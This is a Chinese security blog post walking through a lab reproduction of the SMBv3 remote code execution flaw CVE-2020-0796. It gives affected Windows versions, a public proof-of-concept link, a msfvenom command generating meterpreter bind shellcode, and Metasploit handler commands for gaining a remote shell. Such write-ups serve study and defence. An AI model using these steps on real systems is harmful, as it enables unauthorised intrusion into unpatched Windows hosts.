前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

作者头像
谢公子
发布2022-01-19 21:03:10
7820
发布2022-01-19 21:03:10
举报
文章被收录于专栏:谢公子学安全谢公子学安全

目录

CVE-2020-0796

漏洞描述

漏洞危害等级

影响版本

漏洞复现

实现本地提权

CVE-2020-0796

漏洞描述

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

漏洞危害等级

影响版本

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)

漏洞复现

  • 靶机:192.168.10.26(Win10 1903版本)
  • Kali攻击机:192.168.10.13

POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

先检测目标是否存在该漏洞

使用 msfvenom 生成 python 类型正向连接的 shellcode

代码语言:javascript
复制
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python

将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段,注意要将buf替换为USER_PAYLOAD

MSF启动监听

代码语言:javascript
复制
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 192.168.10.26
run

POC发起攻击,攻击成功

注意:在用POC打的过程中,极易出现蓝屏或重启的风险,使用时应注意!

实现本地提权

来源:谢公子的博客

责编:Zuo

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-06-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 谢公子学安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 目录
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档